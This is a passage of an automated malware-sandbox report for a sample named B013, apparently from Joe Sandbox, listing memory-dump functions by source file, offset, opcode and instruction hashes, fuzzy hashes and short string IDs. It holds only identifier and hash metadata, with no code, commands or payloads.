                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-2697143702
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 94160c59eed475c0d66fb09c14db8421858101e1fee500d2755b78edb9cfcf1c
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 70ba44e029fa8dc466e53fd93ba24a0f4543b02ba39101f01a15f20655712de2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94160c59eed475c0d66fb09c14db8421858101e1fee500d2755b78edb9cfcf1c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12616170E00219DFCB04DFA8D495AEEBBB2FF85301F508569D005AB365DB35AD45CBA1
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: 4'^q$4'^q
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-2697143702
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 895328ade34c801a7887ce2ee60e1c7f91efdbc6bf2cb3cae58a6bbf640252f3
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8cd9ffb9823c485a1c4da5779c894f0ab3f8f0e9fddcf86e99055eb09b709a26
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 895328ade34c801a7887ce2ee60e1c7f91efdbc6bf2cb3cae58a6bbf640252f3
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5514D70E0021ADFCB04DFA8D594AAEBBB1FF89301F108569D005AB365EB35AD45CFA1
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: $^q
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-388095546
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 48a5bcfa4a98071810e593d55cc622ad57ef81d752c8652af79e28b58e92a114
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7d30283eb092085b245dc1d1f041c9dc3f391dedd0e5032e27dca772d9a88feb
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48a5bcfa4a98071810e593d55cc622ad57ef81d752c8652af79e28b58e92a114
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3381E374E11208DFDB58DFA9D594A9DBBB2FF89300F208069E41ABB354DB319986CF50
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: ($eq
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1141795001
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 77dad86e433dc8389a1cf35ec643d1dafa5f8ff2260487394261aaf6cf788bdf
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8ba02117f6c34abb0bf9e08ceb3fd4503f87471fb3289237fe89f75402b09aea
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77dad86e433dc8389a1cf35ec643d1dafa5f8ff2260487394261aaf6cf788bdf
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED514474D20218DBDF24DFA5D9547EEBBB2BF85301F1090AAD419BB240DB701A8ACF51
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: ($eq
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1141795001
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 45245b13d586fcc0b774cd35c53d8707b5c6943f3f0d6ffb66219eca10e61e3d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 351ef7e4ba25ad65ca421d6d8b3451d705eed2fefd1865f7aa0b6759fdd145c5
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45245b13d586fcc0b774cd35c53d8707b5c6943f3f0d6ffb66219eca10e61e3d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC510F74915229CFDB64DF60C944BEDBBB2BF8A301F1080EAC54AA7280DB715AC5CF11
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: ($eq
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1141795001
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1c454fc73b39ae61e37eefe772398f1bee98a573d20fb3c50547ed2ecda0d2b8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 27cc0ad0c3102522e545e6eb650bbdc6aecf00733b8cc76f71d3d872bf65be77
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c454fc73b39ae61e37eefe772398f1bee98a573d20fb3c50547ed2ecda0d2b8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2241FDB4D29219DFDF14CFA9D5487EEBBB5FB49301F10902AE415A3280C7B84A86CF91
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: ($eq
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1141795001
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b6cddfed9f7f2ab11b5e5c629d18e75433492d737b3e57c2b51de78820001e9d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 92c12572c98e8ddfa0ca89e42029e423ff054fed5032f01dff89e049513749d8
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6cddfed9f7f2ab11b5e5c629d18e75433492d737b3e57c2b51de78820001e9d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C941EC74D2A219DFDF14CFA9D5487EEBBB5BB49301F10902AE416A3280C7B84A85CF91
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: ($eq
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1141795001
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f2be60615bdda6ac6bb82d0f191ee567bb74d1dd60051d8b99526e46e7499009
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 75d0e1aa12d805c30e47b0b79505c7cbd9d3fe1437e4277aba220057b3142d0d
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2be60615bdda6ac6bb82d0f191ee567bb74d1dd60051d8b99526e46e7499009
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7413274D2A20ADFDF14DFAAD5482EDBBB6AF49300F20906AE405B3281D7740995CF64
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: ($eq
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1141795001
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fcee9a8c01c6c25239eddf5c04766ab39e2c470e382407a829b825fac1ac4b42
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 25a95a2cd006475663e50ea70bcf84ea4265fea088ede1e388249f8d7e007efd
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fcee9a8c01c6c25239eddf5c04766ab39e2c470e382407a829b825fac1ac4b42
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80410274D2920ADFCF14DFA6D5486EDBBB5BF89301F10902AE415B3281D7744995CF60
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: ($eq
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1141795001
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f94988aaea7eead0d639976b2de79e573a40c09155c777bb55d8d135ac35f0bf
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 72a31e6f106bf768198bf71efecc7d8b90b9c4e15aecc5fc116c1a3e5921614a
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f94988aaea7eead0d639976b2de79e573a40c09155c777bb55d8d135ac35f0bf
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22412274D2920ADFCF14DFAAE5486EDBBB5BF89301F10902AE415B3281D7B44991CF60
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: ($eq
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1141795001
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8cc0be09f019916e6a30a2b60bb4468c2a03b94e2afc36d54f84736d2ee18de1
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f49d3eb37985c0ef336cbc3720a46ab24e2291482bece47f0d16b5b644009469
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8cc0be09f019916e6a30a2b60bb4468c2a03b94e2afc36d54f84736d2ee18de1
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9410274D2A20ADFDF14DFAAD5482EDBBB6AF49300F20902AE405B3291D7740A55CF58
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: Hbq
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1245868
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9d6f074ae70b215c31e974556f29aaa855cf489bb3eed50f338b760f00c23213
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e0e64e767b5be9d0bf0b0b3e9f154b80d64b3d14ce3962bd53fdab4ecbca0e99
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d6f074ae70b215c31e974556f29aaa855cf489bb3eed50f338b760f00c23213
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA21C1343006508FC714AF3CC458A2E77E6FFC9B54B1544AEE446CB3A5CE64EC0A87A0
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: ($eq
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1141795001
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b5cce5a3a6ac4e11e160149eb41ab7de35b19d9deaf9e52b0f01748980b07154
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a164a4e2a18f620555725bf4d64677c4b48e551d711bb40d778127b4b55e740f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5cce5a3a6ac4e11e160149eb41ab7de35b19d9deaf9e52b0f01748980b07154
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E12189748192A8DFCB12CF24D8487E9BB71FF52315F4450EAC499AB142CBB41A89CF66
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: ($eq
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1141795001
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 044c585c40096e64930f3b7c85e9107165507bc54fc503e77d74c37e209866f3
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6de9d0db86477271c496f80f566a82d70506435f02aee776bf3eb481113feb5a
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 044c585c40096e64930f3b7c85e9107165507bc54fc503e77d74c37e209866f3
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5221E274920228DFDB60CF60D848BDDBBB1BB86311F5090EAD489A7240DBB41AC8CF55
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: `Q^q
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1948671464
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c55c0e5fb0c70d1831bb5ef16fa0b0e2e85ea5cee882ac0a4b885357576dedcd
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 97affcc47a6b375f49da802e809d200eb54c4377901c0b384afca406bd2ff542
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c55c0e5fb0c70d1831bb5ef16fa0b0e2e85ea5cee882ac0a4b885357576dedcd
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4DE0E5327441105FD3088A6DAC54F666BD7EFCA610F1900BFE108CF2F1C9519C058355
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: `Q^q
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1948671464
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b6026a2ef20f93b8184bf01ca2887f5662d0f930113e9b61861122a2fd946f82
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bb9e452ee5d435751c5ecf63252b54123dea77e9faf20f6101da7ac979e980b4
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6026a2ef20f93b8184bf01ca2887f5662d0f930113e9b61861122a2fd946f82
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9DE086327401146BD318596FEC94F67B6DEEBC9A20F54007AF209DB3A0CC91EC0542A4
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2c139085d56d98d264ad06ab1b96877bf0e68174b8a3d3e413e2c4417f44063d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4bd944584a80e487c3fe2d575b29b80297da64e9668c7027f2e6e4fd28c42f48
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c139085d56d98d264ad06ab1b96877bf0e68174b8a3d3e413e2c4417f44063d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D12BF306016869FDB15CF28C880ABEB7F6FF84304F448929E856DB299D734F995CB90
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fb5f969b8ddd0081e200e6902fb3162ea8ed28fa4076e5118f961fb89ec974c3
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5c94516ecc746d359f24f1c7b4ea3f4c082360bcc5b54ad1b26950ba6993122d
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb5f969b8ddd0081e200e6902fb3162ea8ed28fa4076e5118f961fb89ec974c3
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88028C31601656CFCB15CF18C8C09BEB7F6FF84310B9A8969D8569B299E330F985CB90
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 91976c9958ac18a76115ed7772af87d8de4db5b866638f3de3abc818bafff1f5
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c1b1af688bd6a6840fa036dac6d1c9936af01a06ac93c62b15acf84dfbbe92ef
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91976c9958ac18a76115ed7772af87d8de4db5b866638f3de3abc818bafff1f5
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5A17631A00605CFCB04EF69C48499DBBB1FF89314F1586A9E905AB369EB70ED85CF90
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: da54afc9d3ba918f33645793afb35e44cfcb2a73b2bd0bfefa3b9bd9513deeb9
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c3eee5d92926fadb5b6389490f5c93f08741bc42240946045a2b6e66e0bb7ba2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da54afc9d3ba918f33645793afb35e44cfcb2a73b2bd0bfefa3b9bd9513deeb9
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35A18531A00605CFCB04EF6DC48499DBBB1FF89314F1196A9E505AB369EB70ED85CB90
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6e10975758906f30ce603891b197411e5bd21a807222855240c5051babaff8d8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7357600bbddcfa9c4cfdd8edfcbcebdcc1c9e76abe21bb02b090e1b802068470
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e10975758906f30ce603891b197411e5bd21a807222855240c5051babaff8d8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F68169303016829FEB19DF28D560B7E77E6FF84248F041528E502CB799EB34E891CB91
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
